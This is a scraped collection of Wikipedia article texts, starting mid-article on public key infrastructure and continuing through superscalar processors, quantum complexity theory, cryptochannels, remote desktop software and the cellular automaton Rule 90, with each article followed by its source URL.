For distributing revocation information to clients, timeliness of the discovery of revocation (and hence the window for an attacker to exploit a compromised certificate) trades off against resource usage in querying revocation statuses and privacy concerns.[18]If revocation information is unavailable (either due to accident or an attack), clients must decide whether tofail-hardand treat a certificate as if it is revoked (and so degradeavailability) or tofail-softand treat it as unrevoked (and allow attackers to sidestep revocation).[19]
Due to the cost of revocation checks and the availability impact from potentially-unreliable remote services,Web browserslimit the revocation checks they will perform, and will fail-soft where they do.[20]Certificate revocation listsare too bandwidth-costly for routine use, and theOnline Certificate Status Protocolpresents connection latency and privacy issues. Other schemes have been proposed but have not yet been successfully deployed to enable fail-hard checking.[16]
In this model of trust relationships, a CA is a trusted third party – trusted both by the subject (owner) of the certificate and by the party relying upon the certificate.
According to NetCraft report from 2015,[21]the industry standard for monitoring activeTransport Layer Security(TLS) certificates, states that "Although the global [TLS] ecosystem is competitive, it is dominated by a handful of major CAs — three certificate authorities (Symantec,Sectigo,GoDaddy) account for three-quarters of all issued [TLS] certificates on public-facing web servers. The top spot has been held by Symantec (orVeriSignbefore it was purchased by Symantec) ever since [our] survey began, with it currently accounting for just under a third of all certificates. To illustrate the effect of differing methodologies, amongst the million busiest sites Symantec issued 44% of the valid, trusted certificates in use — significantly more than its overall market share."
Following major issues in how certificate issuing was managed, all major players gradually distrusted Symantec-issued certificates, starting in 2017 and completed in 2021.[22][23][24][25]
This approach involves a server that acts as an offline certificate authority within asingle sign-onsystem. A single sign-on server will issue digital certificates into the client system, but never stores them. Users can execute programs, etc. with the temporary certificate. It is common to find this solution variety withX.509-based certificates.[26]
Starting Sep 2020, TLS Certificate Validity reduced to 13 Months.
An alternative approach to the problem of public authentication of public key information is the web-of-trust scheme, which uses self-signedcertificatesand third-party attestations of those certificates. The singular term "web of trust" does not imply the existence of a single web of trust, or common point of trust, but rather one of any number of potentially disjoint "webs of trust". Examples of implementations of this approach arePGP(Pretty Good Privacy) andGnuPG(an implementation ofOpenPGP, the standardized specification of PGP). Because PGP and implementations allow the use ofe-maildigital signatures for self-publication of public key information, it is relatively easy to implement one's own web of trust.
One of the benefits of the web of trust, such as inPGP, is that it can interoperate with a PKI CA fully trusted by all parties in a domain (such as an internal CA in a company) that is willing to guarantee certificates, as a trusted introducer. If the "web of trust" is completely trusted then, because of the nature of a web of trust, trusting one certificate is granting trust to all the certificates in that web. A PKI is only as valuable as the standards and practices that control the issuance of certificates and including PGP or a personally instituted web of trust could significantly degrade the trustworthiness of that enterprise's or domain's implementation of PKI.[27]
The web of trust concept was first put forth by PGP creatorPhil Zimmermannin 1992 in the manual for PGP version 2.0:
As time goes on, you will accumulate keys from other people that you may want to designate as trusted introducers. Everyone else will each choose their own trusted introducers. And everyone will gradually accumulate and distribute with their key a collection of certifying signatures from other people, with the expectation that anyone receiving it will trust at least one or two of the signatures. This will cause the emergence of a decentralized fault-tolerant web of confidence for all public keys.
Another alternative, which does not deal with public authentication of public key information, is the simple public key infrastructure (SPKI), which grew out of three independent efforts to overcome the complexities ofX.509andPGP's web of trust. SPKI does not associate users with persons, since thekeyis what is trusted, rather than the person. SPKI does not use any notion of trust, as the verifier is also the issuer. This is called an "authorization loop" in SPKI terminology, where authorization is integral to its design.[28]This type of PKI is specially useful for making integrations of PKI that do not rely on third parties for certificate authorization, certificate information, etc.; a good example of this is anair-gappednetwork in an office.
Decentralized identifiers(DIDs) eliminate dependence on centralized registries for identifiers as well as centralized certificate authorities for key management, which is the standard in hierarchical PKI. In cases where the DID registry is adistributed ledger, each entity can serve as its own root authority. This architecture is referred to as decentralized PKI (DPKI).[29][30]
Developments in PKI occurred in the early 1970s at the British intelligence agencyGCHQ, whereJames Ellis,Clifford Cocksand others made important discoveries related to encryption algorithms and key distribution.[31]Because developments at GCHQ are highly classified, the results of this work were kept secret and not publicly acknowledged until the mid-1990s.
The public disclosure of both securekey exchangeandasymmetric key algorithmsin 1976 byDiffie,Hellman,Rivest,Shamir, andAdlemanchanged secure communications entirely. With the further development of high-speed digital electronic communications (theInternetand its predecessors), a need became evident for ways in which users could securely communicate with each other, and as a further consequence of that, for ways in which users could be sure with whom they were actually interacting.
Assorted cryptographic protocols were invented and analyzed within which the newcryptographic primitivescould be effectively used. With the invention of theWorld Wide Weband its rapid spread, the need for authentication and secure communication became still more acute. Commercial reasons alone (e.g.,e-commerce, online access to proprietary databases fromweb browsers) were sufficient.Taher Elgamaland others atNetscapedeveloped theSSLprotocol ('https' in WebURLs); it included key establishment, server authentication (prior to v3, one-way only), and so on.[32]A PKI structure was thus created for Web users/sites wishing secure communications.
Vendors and entrepreneurs saw the possibility of a large market, started companies (or new projects at existing companies), and began to agitate for legal recognition and protection from liability. AnAmerican Bar Associationtechnology project published an extensive analysis of some of the foreseeable legal aspects of PKI operations (seeABA digital signature guidelines), and shortly thereafter, several U.S. states (Utahbeing the first in 1995) and other jurisdictions throughout the world began to enact laws and adopt regulations. Consumer groups raised questions aboutprivacy, access, and liability considerations, which were more taken into consideration in some jurisdictions than in others.[33]
The enacted laws and regulations differed, there were technical and operational problems in converting PKI schemes into successful commercial operation, and progress has been much slower than pioneers had imagined it would be.
By the first few years of the 21st century, the underlying cryptographic engineering was clearly not easy to deploy correctly. Operating procedures (manual or automatic) were not easy to correctly design (nor even if so designed, to execute perfectly, which the engineering required). The standards that existed were insufficient.
PKI vendors have found a market, but it is not quite the market envisioned in the mid-1990s, and it has grown both more slowly and in somewhat different ways than were anticipated.[34]PKIs have not solved some of the problems they were expected to, and several major vendors have gone out of business or been acquired by others. PKI has had the most success in government implementations; the largest PKI implementation to date is theDefense Information Systems Agency(DISA) PKI infrastructure for theCommon Access Cardsprogram.
PKIs of one type or another, and from any of several vendors, have many uses, including providing public keys and bindings to user identities, which are used for:
Some argue that purchasing certificates for securing websites bySSL/TLSand securing software bycode signingis a costly venture for small businesses.[41]However, the emergence of free alternatives, such asLet's Encrypt, has changed this.HTTP/2, the latest version of HTTP protocol, allows unsecured connections in theory; in practice, major browser companies have made it clear that they would support this protocol only over a PKI securedTLSconnection.[42]Web browser implementation of HTTP/2 includingChrome,Firefox,Opera, andEdgesupports HTTP/2 only over TLS by using theALPNextension of the TLS protocol. This would mean that, to get the speed benefits of HTTP/2, website owners would be forced to purchase SSL/TLS certificates controlled by corporations.
Currently the majority of web browsers are shipped with pre-installedintermediate certificatesissued and signed by a certificate authority, by public keys certified by so-calledroot certificates. This means browsers need to carry a large number of different certificate providers, increasing the risk of a key compromise.[43]
When a key is known to be compromised, it could be fixed by revoking the certificate, but such a compromise is not easily detectable and can be a huge security breach. Browsers have to issue a security patch to revoke intermediary certificates issued by a compromised root certificate authority.[44]
|
https://en.wikipedia.org/wiki/Public_key_infrastructure
|
Asuperscalar processor(ormultiple-issue processor[1]) is aCPUthat implements a form ofparallelismcalledinstruction-level parallelismwithin a single processor.[2]In contrast to ascalar processor, which can execute at most one single instruction per clock cycle, a superscalar processor can execute or start executing more than one instruction during a clock cycle by simultaneously dispatching multiple instructions to differentexecution unitson the processor. It therefore allows morethroughput(the number of instructions that can be executed in a unit of time which can even be less than 1) than would otherwise be possible at a givenclock rate. Each execution unit is not a separate processor (or a core if the processor is amulti-core processor), but an execution resource within a single CPU such as anarithmetic logic unit.
While a superscalar CPU is typically alsopipelined, superscalar and pipelining execution are considered different performance enhancement techniques. The former (superscalar) executes multiple instructions in parallel by using multiple execution units, whereas the latter (pipeline) executes multiple instructions in the same execution unit in parallel by dividing the execution unit into different phases. In the "Simple superscalar pipeline" figure, fetching two instructions at the same time is superscaling, and fetching the next two before the first pair has been written back is pipelining.
The superscalar technique is traditionally associated with several identifying characteristics (within a given CPU):
Seymour Cray'sCDC 6600from 1964, while not capable of issuing multiple instructions per cycle, is often cited as an early influence to modern superscalar processors for its ability to execute instructions simultaneously through multiple functional units. The 1967IBM System/360 Model 91, was another early influence that introduced out-of-order execution, pioneering use ofTomasulo's algorithm.[3]TheIntel i960CA (1989),[4]theAMD 29000-series 29050 (1990), and the MotorolaMC88110(1991),[5]microprocessors were the first commercial single-chip superscalar microprocessors.RISCmicroprocessors like these were the first to have superscalar execution, because RISC architectures free transistors and die area which can be used to include multiple execution units and the traditional uniformity of the instruction set favors superscalar dispatch (this was why RISC designs were faster thanCISCdesigns through the 1980s and into the 1990s, and it's far more complicated to do multiple dispatch when instructions have variable bit length).
Except for CPUs used inlow-powerapplications,embedded systems, andbattery-powered devices, essentially all general-purpose CPUs developed since about 1998 are superscalar.
TheP5 Pentiumwas the first superscalar x86 processor; theNx586,P6 Pentium ProandAMD K5were among the first designs which decodex86-instructions asynchronously into dynamicmicrocode-likemicro-opsequences prior to actual execution on a superscalarmicroarchitecture; this opened up for dynamic scheduling of bufferedpartialinstructions and enabled more parallelism to be extracted compared to the more rigid methods used in the simpler P5 Pentium; it also simplifiedspeculative executionand allowed higher clock frequencies compared to designs such as the advancedCyrix 6x86.
The simplest processors are scalar processors. Each instruction executed by a scalar processor typically manipulates one or two data items at a time. By contrast, each instruction executed by avector processoroperates simultaneously on many data items. An analogy is the difference betweenscalarand vector arithmetic. A superscalar processor is a mixture of the two. Each instruction processes one data item, but there are multiple execution units within each CPU thus multiple instructions can be processing separate data items concurrently.
Superscalar CPU design emphasizes improving the instruction dispatcher accuracy and allowing it to keep the multiple execution units in use at all times. This has become increasingly important as the number of units has increased. While early superscalar CPUs would have twoALUsand a singleFPU, a later design such as thePowerPC 970includes four ALUs, two FPUs, and two SIMD units. If the dispatcher is ineffective at keeping all of these units fed with instructions, the performance of the system will be no better than that of a simpler, cheaper design.
A superscalar processor usually sustains an execution rate in excess of oneinstruction per machine cycle. But merely processing multiple instructions concurrently does not make an architecture superscalar, sincepipelined,multiprocessorormulti-corearchitectures also achieve that, but with different methods.
In a superscalar CPU the dispatcher reads instructions from memory and decides which ones can be run in parallel, dispatching each to one of the several execution units contained inside a single CPU. Therefore, a superscalar processor can be envisioned as having multiple parallel pipelines, each of which is processing instructions simultaneously from a single instruction thread.
Most modern superscalar CPUs also have logic to reorder the instructions to try to avoid pipeline stalls and increase parallel execution.
Available performance improvement from superscalar techniques is limited by three key areas:
Existing binary executable programs have varying degrees of intrinsic parallelism. In some cases instructions are not dependent on each other and can be executed simultaneously. In other cases they are inter-dependent: one instruction impacts either resources or results of the other. The instructionsa = b + c; d = e + fcan be run in parallel because none of the results depend on other calculations. However, the instructionsa = b + c; b = e + fmight not be runnable in parallel, depending on the order in which the instructions complete while they move through the units.
Although the instruction stream may contain no inter-instruction dependencies, a superscalar CPU must nonetheless check for that possibility, since there is no assurance otherwise and failure to detect a dependency would produce incorrect results.
No matter how advanced thesemiconductor processor how fast the switching speed, this places a practical limit on how many instructions can be simultaneously dispatched. While process advances will allow ever greater numbers of execution units (e.g. ALUs), the burden of checking instruction dependencies grows rapidly, as does the complexity of register renaming circuitry to mitigate some dependencies. Collectively thepower consumption, complexity and gate delay costs limit the achievable superscalar speedup.
However even given infinitely fast dependency checking logic on an otherwise conventional superscalar CPU, if the instruction stream itself has many dependencies, this would also limit the possible speedup. Thus the degree of intrinsic parallelism in the code stream forms a second limitation.
Collectively, these limits drive investigation into alternative architectural changes such asvery long instruction word(VLIW),explicitly parallel instruction computing(EPIC),simultaneous multithreading(SMT), andmulti-core computing.
With VLIW, the burdensome task of dependency checking byhardware logicat run time is removed and delegated to thecompiler.Explicitly parallel instruction computing(EPIC) is like VLIW with extra cache prefetching instructions.
Simultaneous multithreading (SMT) is a technique for improving the overall efficiency of superscalar processors. SMT permits multiple independent threads of execution to better utilize the resources provided by modern processor architectures. The fact that they are independent means that we know that the instruction of one thread can be executed out of order and/or in parallel with the instruction of a different one. Also, one independent thread will not produce a pipeline bubble in the code stream of a different one, for example, due to a branch.
Superscalar processors differ frommulti-core processorsin that the several execution units are not entire processors. A single processor is composed of finer-grained execution units such as theALU,integermultiplier, integer shifter,FPU, etc. There may be multiple versions of each execution unit to enable the execution of many instructions in parallel. This differs from a multi-core processor that concurrently processes instructions frommultiplethreads, one thread perprocessing unit(called "core"). It also differs from apipelined processor, where the multiple instructions can concurrently be in various stages of execution,assembly-linefashion.
The various alternative techniques are not mutually exclusive—they can be (and frequently are) combined in a single processor. Thus a multicore CPU is possible where each core is an independent processor containing multiple parallel pipelines, each pipeline being superscalar. Some processors also includevectorcapability.
|
https://en.wikipedia.org/wiki/Superscalar
|
Quantum complexity theoryis the subfield ofcomputational complexity theorythat deals withcomplexity classesdefined usingquantum computers, acomputational modelbased onquantum mechanics. It studies the hardness ofcomputational problemsin relation to these complexity classes, as well as the relationship between quantum complexity classes and classical (i.e., non-quantum) complexity classes.
Two important quantum complexity classes areBQPandQMA.
Acomplexity classis a collection ofcomputational problemsthat can be solved by a computational model under certain resource constraints. For instance, the complexity classPis defined as the set of problems solvable by aTuring machineinpolynomial time. Similarly, quantum complexity classes may be defined using quantum models of computation, such as thequantum circuit modelor the equivalentquantum Turing machine. One of the main aims of quantum complexity theory is to find out how these classes relate to classical complexity classes such asP,NP,BPP, andPSPACE.
One of the reasons quantum complexity theory is studied are the implications of quantum computing for the modernChurch-Turing thesis. In short the modern Church-Turing thesis states that any computational model can be simulated in polynomial time with aprobabilistic Turing machine.[1][2]However, questions around the Church-Turing thesis arise in the context of quantum computing. It is unclear whether the Church-Turing thesis holds for the quantum computation model. There is much evidence that the thesis does not hold. It may not be possible for a probabilistic Turing machine to simulate quantum computation models in polynomial time.[1]
Both quantum computational complexity of functions and classical computational complexity of functions are often expressed withasymptotic notation. Some common forms of asymptotic notion of functions areO(T(n)){\displaystyle O(T(n))},Ω(T(n)){\displaystyle \Omega (T(n))}, andΘ(T(n)){\displaystyle \Theta (T(n))}.O(T(n)){\displaystyle O(T(n))}expresses that something is bounded above bycT(n){\displaystyle cT(n)}wherec{\displaystyle c}is a constant such thatc>0{\displaystyle c>0}andT(n){\displaystyle T(n)}is a function ofn{\displaystyle n},Ω(T(n)){\displaystyle \Omega (T(n))}expresses that something is bounded below bycT(n){\displaystyle cT(n)}wherec{\displaystyle c}is a constant such thatc>0{\displaystyle c>0}andT(n){\displaystyle T(n)}is a function ofn{\displaystyle n}, andΘ(T(n)){\displaystyle \Theta (T(n))}expresses bothO(T(n)){\displaystyle O(T(n))}andΩ(T(n)){\displaystyle \Omega (T(n))}.[3]These notations also have their own names.O(T(n)){\displaystyle O(T(n))}is calledBig O notation,Ω(T(n)){\displaystyle \Omega (T(n))}is called Big Omega notation, andΘ(T(n)){\displaystyle \Theta (T(n))}is called Big Theta notation.
The important complexity classes P, BPP, BQP, PP, and PSPACE can be compared based onpromise problems. A promise problem is a decision problem which has an input assumed to be selected from the set of all possible input strings. A promise problem is a pairA=(Ayes,Ano){\displaystyle A=(A_{\text{yes}},A_{\text{no}})}, whereAyes{\displaystyle A_{\text{yes}}}is the set of yes instances andAno{\displaystyle A_{\text{no}}}is the set of no instances, and the intersection of these sets is empty:Ayes∩Ano=∅{\displaystyle A_{\text{yes}}\cap A_{\text{no}}=\varnothing }. All of the previous complexity classes contain promise problems.[4]
The class ofproblemsthat can be efficiently solved by a quantum computer with bounded error is called BQP ("bounded error, quantum, polynomial time"). More formally, BQP is the class of problems that can be solved by a polynomial-timequantum Turing machinewith error probability of at most 1/3.
As a class of probabilistic problems, BQP is the quantum counterpart toBPP("bounded error, probabilistic, polynomial time"), the class of problems that can be efficiently solved byprobabilistic Turing machineswith bounded error.[6]It is known thatBPP⊆BQP{\displaystyle {\mathsf {BPP\subseteq BQP}}}and widely suspected, but not proven, thatBQP⊈BPP{\displaystyle {\mathsf {BQP\nsubseteq BPP}}}, which intuitively would mean that quantum computers are more powerful than classical computers in terms of time complexity.[7]BQP is a subset ofPP.
The exact relationship of BQP toP,NP, andPSPACEis not known. However, it is known thatP⊆BQP⊆PSPACE{\displaystyle {\mathsf {P\subseteq BQP\subseteq PSPACE}}}; that is, the class of problems that can be efficiently solved by quantum computers includes all problems that can be efficiently solved by deterministic classical computers but does not include any problems that cannot be solved by classical computers with polynomial space resources. It is further suspected that BQP is a strict superset of P, meaning there are problems that are efficiently solvable by quantum computers that are not efficiently solvable by deterministic classical computers. For instance,integer factorizationand thediscrete logarithm problemare known to be in BQP and are suspected to be outside of P. On the relationship of BQP to NP, little is known beyond the fact that some NP problems are in BQP (integer factorization and the discrete logarithm problem are both in NP, for example). It is suspected thatNP⊈BQP{\displaystyle {\mathsf {NP\nsubseteq BQP}}}; that is, it is believed that there are efficiently checkable problems that are not efficiently solvable by a quantum computer. As a direct consequence of this belief, it is also suspected that BQP is disjoint from the class ofNP-completeproblems (if any NP-complete problem were in BQP, then it follows fromNP-hardnessthat all problems in NP are in BQP).[8]
The relationship of BQP to the essential classical complexity classes can be summarized as:
It is also known that BQP is contained in the complexity class#P{\displaystyle \color {Blue}{\mathsf {\#P}}}(or more precisely in the associated class of decision problemsP#P{\displaystyle {\mathsf {P^{\#P}}}}),[8]which is a subset ofPSPACE.
There is no known way to efficiently simulate a quantum computational model with a classical computer. This means that a classical computer cannot simulate a quantum computational model in polynomial time. However, aquantum circuitofS(n){\displaystyle S(n)}qubits withT(n){\displaystyle T(n)}quantum gates can be simulated by a classical circuit withO(2S(n)T(n)3){\displaystyle O(2^{S(n)}T(n)^{3})}classical gates.[3]This number of classical gates is obtained by determining how many bit operations are necessary to simulate the quantum circuit. In order to do this, first the amplitudes associated with theS(n){\displaystyle S(n)}qubits must be accounted for. Each of the states of theS(n){\displaystyle S(n)}qubits can be described by a two-dimensional complex vector, or a state vector. These state vectors can also be described alinear combinationof itscomponent vectorswith coefficients called amplitudes. These amplitudes are complex numbers which are normalized to one, meaning the sum of the squares of the absolute values of the amplitudes must be one.[3]The entries of the state vector are these amplitudes. Which entry each of the amplitudes are correspond to the none-zero component of the component vector which they are the coefficients of in the linear combination description. As an equation this is described asα[10]+β[01]=[αβ]{\displaystyle \alpha {\begin{bmatrix}1\\0\end{bmatrix}}+\beta {\begin{bmatrix}0\\1\end{bmatrix}}={\begin{bmatrix}\alpha \\\beta \end{bmatrix}}}orα|1⟩+β|0⟩=[αβ]{\displaystyle \alpha \left\vert 1\right\rangle +\beta \left\vert 0\right\rangle ={\begin{bmatrix}\alpha \\\beta \end{bmatrix}}}usingDirac notation. The state of the entireS(n){\displaystyle S(n)}qubit system can be described by a single state vector. This state vector describing the entire system is the tensor product of the state vectors describing the individual qubits in the system. The result of the tensor products of theS(n){\displaystyle S(n)}qubits is a single state vector which has2S(n){\displaystyle 2^{S(n)}}dimensions and entries that are the amplitudes associated with each basis state or component vector. Therefore,2S(n){\displaystyle 2^{S(n)}}amplitudes must be accounted for with a2S(n){\displaystyle 2^{S(n)}}dimensional complex vector which is the state vector for theS(n){\displaystyle S(n)}qubit system.[9]In order to obtain an upper bound for the number of gates required to simulate a quantum circuit we need a sufficient upper bound for the amount data used to specify the information about each of the2S(n){\displaystyle 2^{S(n)}}amplitudes. To do thisO(T(n)){\displaystyle O(T(n))}bits of precision are sufficient for encoding each amplitude.[3]So it takesO(2S(n)T(n)){\displaystyle O(2^{S(n)}T(n))}classical bits to account for the state vector of theS(n){\displaystyle S(n)}qubit system. Next the application of theT(n){\displaystyle T(n)}quantum gates on2S(n){\displaystyle 2^{S(n)}}amplitudes must be accounted for. The quantum gates can be represented as2S(n)×2S(n){\displaystyle 2^{S(n)}\times 2^{S(n)}}sparse matrices.[3]So to account for the application of each of theT(n){\displaystyle T(n)}quantum gates, the state vector must be multiplied by a2S(n)×2S(n){\displaystyle 2^{S(n)}\times 2^{S(n)}}sparse matrix for each of theT(n){\displaystyle T(n)}quantum gates. Every time the state vector is multiplied by a2S(n)×2S(n){\displaystyle 2^{S(n)}\times 2^{S(n)}}sparse matrix,O(2S(n)){\displaystyle O(2^{S(n)})}arithmetic operations must be performed.[3]Therefore, there areO(2S(n)T(n)2){\displaystyle O(2^{S(n)}T(n)^{2})}bit operations for every quantum gate applied to the state vector. SoO(2S(n)T(n)2){\displaystyle O(2^{S(n)}T(n)^{2})}classical gate are needed to simulateS(n){\displaystyle S(n)}qubit circuit with just one quantum gate. Therefore,O(2S(n)T(n)3){\displaystyle O(2^{S(n)}T(n)^{3})}classical gates are needed to simulate a quantum circuit ofS(n){\displaystyle S(n)}qubits withT(n){\displaystyle T(n)}quantum gates.[3]While there is no known way to efficiently simulate a quantum computer with a classical computer, it is possible to efficiently simulate a classical computer with a quantum computer. This is evident from the fact thatBPP⊆BQP{\displaystyle {\mathsf {BPP\subseteq BQP}}}.[4]
One major advantage of using a quantum computational system instead of a classical one, is that a quantum computer may be able to give apolynomial time algorithmfor some problem for which no classical polynomial time algorithm exists, but more importantly, a quantum computer may significantly decrease the calculation time for a problem that a classical computer can already solve efficiently. Essentially, a quantum computer may be able to both determine how long it will take to solve a problem, while a classical computer may be unable to do so, and can also greatly improve the computational efficiency associated with the solution to a particular problem. Quantum query complexity refers to how complex, or how many queries to the graph associated with the solution of a particular problem, are required to solve the problem. Before we delve further into query complexity, let us consider some background regarding graphing solutions to particular problems, and the queries associated with these solutions.
One type of problem that quantum computing can make easier to solve are graph problems. If we are to consider the amount of queries to a graph that are required to solve a given problem, let us first consider the most common types of graphs, calleddirected graphs, that are associated with this type of computational modelling. In brief, directed graphs are graphs where all edges between vertices are unidirectional. Directed graphs are formally defined as the graphG=(N,E){\displaystyle G=(N,E)}, where N is the set of vertices, or nodes, and E is the set of edges.[10]
When considering quantum computation of the solution to directed graph problems, there are two important query models to understand. First, there is theadjacency matrixmodel, where the graph of the solution is given by the adjacency matrix:M∈{0,1}anXn{\displaystyle M\in \{0,1\}a^{n\mathrm {X} n}}, withMij=1{\displaystyle M_{ij}=1}, if and only if(vi,vj)∈E{\displaystyle (v_{i},v_{j})\in E}.[11]
Next, there is the slightly more complicated adjacency array model built on the idea ofadjacency lists, where every vertex,u{\displaystyle u},is associated with an array of neighboring vertices such thatfi:[di+]→[n]{\displaystyle f_{i}:[d_{i}^{+}]\rightarrow [n]}, for the out-degrees of verticesdi+,...,dn+{\displaystyle d_{i}^{+},...,d_{n}^{+}}, wheren{\displaystyle n}is the minimum value of the upper bound of this model, andfi(j){\displaystyle f_{i}(j)}returns the "jth{\displaystyle j^{th}}" vertex adjacent toi{\displaystyle i}. Additionally, the adjacency array model satisfies the simple graph condition,∀i∈[n],j,j′∈[k],j≠j′:fi(j)≠fi(j′){\displaystyle \forall i\in [n],j,j'\in [k],j\neq j':f_{i}(j)\neq f_{i}(j')}, meaning that there is only one edge between any pair of vertices, and the number of edges is minimized throughout the entire model (seeSpanning treemodel for more background).[11]
Both of the above models can be used to determine the query complexity of particular types of graphing problems, including theconnectivity,strong connectivity(a directed graph version of the connectivity model),minimum spanning tree, andsingle source shortest pathmodels of graphs. An important caveat to consider is that the quantum complexity of a particular type of graphing problem can change based on the query model (namely either matrix or array) used to determine the solution. The following table showing the quantum query complexities of these types of graphing problems illustrates this point well.
Notice the discrepancy between the quantum query complexities associated with a particular type of problem, depending on which query model was used to determine the complexity. For example, when the matrix model is used, the quantum complexity of the connectivity model inBig O notationisΘ(n3/2){\displaystyle \Theta (n^{3/2})}, but when the array model is used, the complexity isΘ(n){\displaystyle \Theta (n)}. Additionally, for brevity, we use the shorthandm{\displaystyle m}in certain cases, wherem=Θ(n2){\displaystyle m=\Theta (n^{2})}.[11]The important implication here is that the efficiency of the algorithm used to solve a graphing problem is dependent on the type of query model used to model the graph.
In the query complexity model, the input can also be given as an oracle (black box). The algorithm gets information about the input only by querying the oracle. The algorithm starts in some fixed quantum state and the state evolves as it queries the oracle.
Similar to the case of graphing problems, the quantum query complexity of a black-box problem is the smallest number of queries to the oracle that are required in order to calculate the function. This makes the quantum query complexity a lower bound on the overall time complexity of a function.
An example depicting the power of quantum computing isGrover's algorithmfor searching unstructured databases. The algorithm's quantum query complexity isO(N){\textstyle O{\left({\sqrt {N}}\right)}}, a quadratic improvement over the best possible classical query complexityO(N){\displaystyle O(N)}, which is alinear search. Grover's algorithm isasymptotically optimal; in fact, it uses at most a1+o(1){\displaystyle 1+o(1)}fraction more queries than the best possible algorithm.[12]
TheDeutsch-Jozsa algorithmis a quantum algorithm designed to solve a toy problem with a smaller query complexity than is possible with a classical algorithm. The toy problem asks whether a functionf:{0,1}n→{0,1}{\displaystyle f:\{0,1\}^{n}\rightarrow \{0,1\}}is constant or balanced, those being the only two possibilities.[2]The only way to evaluate the functionf{\displaystyle f}is to consult ablack boxororacle. A classicaldeterministic algorithmwill have to check more than half of the possible inputs to be sure of whether or not the function is constant or balanced. With2n{\displaystyle 2^{n}}possible inputs, the query complexity of the most efficient classical deterministic algorithm is2n−1+1{\displaystyle 2^{n-1}+1}.[2]The Deutsch-Jozsa algorithm takes advantage of quantum parallelism to check all of the elements of the domain at once and only needs to query the oracle once, making its query complexity1{\displaystyle 1}.[2]
It has been speculated that further advances in physics could lead to even faster computers. For instance, it has been shown that a non-local hidden variable quantum computer based onBohmian Mechanicscould implement a search of anN-item database in at mostO(N3){\displaystyle O({\sqrt[{3}]{N}})}steps, a slight speedup overGrover's algorithm, which runs inO(N){\displaystyle O({\sqrt {N}})}steps. Note, however, that neither search method would allow quantum computers to solveNP-completeproblems in polynomial time.[13]Theories ofquantum gravity, such asM-theoryandloop quantum gravity, may allow even faster computers to be built. However, defining computation in these theories is an open problem due to theproblem of time; that is, within these physical theories there is currently no obvious way to describe what it means for an observer to submit input to a computer at one point in time and then receive output at a later point in time.[14][15]
|
https://en.wikipedia.org/wiki/Quantum_complexity_theory
|
Intelecommunications, acryptochannelis a completesystemofcrypto-communicationsbetween two or more holders or parties. It includes: (a) the cryptographic aids prescribed; (b) the holders thereof; (c) the indicators or other means of identification; (d) the area or areas in which effective; (e) the special purpose, if any, for which provided; and (f) pertinent notes as to distribution, usage,etc.A cryptochannel is analogous to aradiocircuit.[1][2][3][4]
This article related totelecommunicationsis astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/Cryptochannel
|
Incomputing, the termremote desktoprefers to asoftware- oroperating systemfeature that allows apersonal computer'sdesktop environmentto be run remotely from one system (usually a PC, but the concept applies equally to aserveror asmartphone), while being displayed on a separateclient device. Remote desktop applications have varying features. Some allow attaching to an existing user'ssessionand "remote controlling", either displaying the remote control session or blanking the screen. Taking over a desktop remotely is a form of remote administration.
Remote access can also be explained as the remote control of a computer by using another device connected via the internet or another network. This is widely used by many computer manufacturers and large businesses help desks for technical troubleshooting of their customer's problems.
Remote desktop software captures the mouse and keyboard inputs from the local computer (client) and sends them to theremote computer(server).[1]The remote computer in turn sends the display commands to the local computer. When applications with many graphics including video or 3D models need to be controlled remotely, a remote workstation software that sends the pixels rather than the display commands must be used to provide a smooth, like-local experience.
Remote desktop sharing is accomplished through a common client/server model. The client, orVNCviewer, is installed on a local computer and then connects via a network to a server component, which is installed on the remote computer. In a typical VNC session, all keystrokes and mouse clicks are registered as if the client were actually performing tasks on the end-user machine.[2]
Remote desktops also have a major advantage for security development, companies are able to permit software engineers who may be dispersed geographically to operate and develop from a computer which can be held within the companies office or cloud environment.
The target computer in a remote desktop scenario is still able to access all of its core functions. Many of these core functions, including the mainclipboard, can be shared between the target computer and remote desktop client.
Following the onset ofCOVID-19, the shift to remote-work environments has led many to work from home with devices without enterprise IT support. As a result, these workers ware reliant on remote desktop software to collaborate and keep their systems available and secure.[3]
A main use of remote desktop software is remote administration and remote implementation. This need arises when software buyers are far away from their software vendor. Most remote access software can be used for "headless computers": instead of each computer having its own monitor, keyboard, and mouse, or using aKVM switch, one computer can have a monitor, keyboard, mouse, and remote control software, and control many headless computers. The duplicate desktop mode is useful for user support and education. Remote control software combined with telephone communication can be nearly as helpful for novice computer-users as if the support staff were actually there.
Remote desktop software can be used to access a remote computer: a physical personalcomputerto which a user does not have physical access, but that can be accessed or interacted with.[4]Unlikeservers, remote computers are mainly used for peer to peer connections, where one device is unattended. A remote computer connection is generally only possible if both devices have anetworkconnection.
Since the advent ofcloud computingremote desktop software can be housed onUSB hardware devices, allowing users to connect the device to any PC connected to their network or the Internet and recreate their desktop via a connection to the cloud. This model avoids one problem with remote desktop software, which requires the local computer to be switched on at the time when the user wishes to access it remotely. (It is possible with a router with C2S VPN support, andwake on LANequipment, to establish avirtual private network(VPN) connection with the router over the Internet if not connected to theLAN, switch on a computer connected to the router, then connect to it.)
Remote desktop products are available in three models: hosted service, software, and appliance.
Tech support scammersuse remote desktop software to connect to their victim's computer and will often lock out the computer if the victim does not cooperate.
Remote desktopprotocolsinclude the following:
Aremote access trojan(RAT, sometimes calledcreepware)[6]is a type ofmalwarethat controls a system through a remote network connection. Whiledesktop sharingandremote administrationhave many legal uses, "RAT" connotes criminal or malicious activity. A RAT is typically installed without the victim's knowledge, often as payload of aTrojan horse, and will try to hide its operation from the victim and fromcomputer security softwareand other anti-virus software.[7][8][9][10][11][12]
|
https://en.wikipedia.org/wiki/Remote_desktop_software
|
In themathematicalstudy ofcellular automata,Rule 90is anelementary cellular automatonbased on theexclusive orfunction. It consists of a one-dimensional array of cells, each of which can hold either a 0 or a 1 value. In each time step all values are simultaneously replaced by theXORof their two neighboring values.[1]Martin, Odlyzko & Wolfram (1984)call it "the simplest non-trivial cellular automaton",[2]and it is described extensively inStephen Wolfram's 2002 bookA New Kind of Science.[3]
When started from a single live cell, Rule 90 has a time-space diagram in the form of aSierpiński triangle. The behavior of any other configuration can be explained as a superposition of copies of this pattern, combined using theexclusive orfunction. Any configuration with only finitely many nonzero cells becomes areplicatorthat eventually fills the array with copies of itself. When Rule 90 is started from arandominitial configuration, its configuration remains random at each time step. Its time-space diagram forms many triangular "windows" of different sizes, patterns that form when a consecutive row of cells becomes simultaneously zero and then cells with value 1 gradually move into this row from both ends.
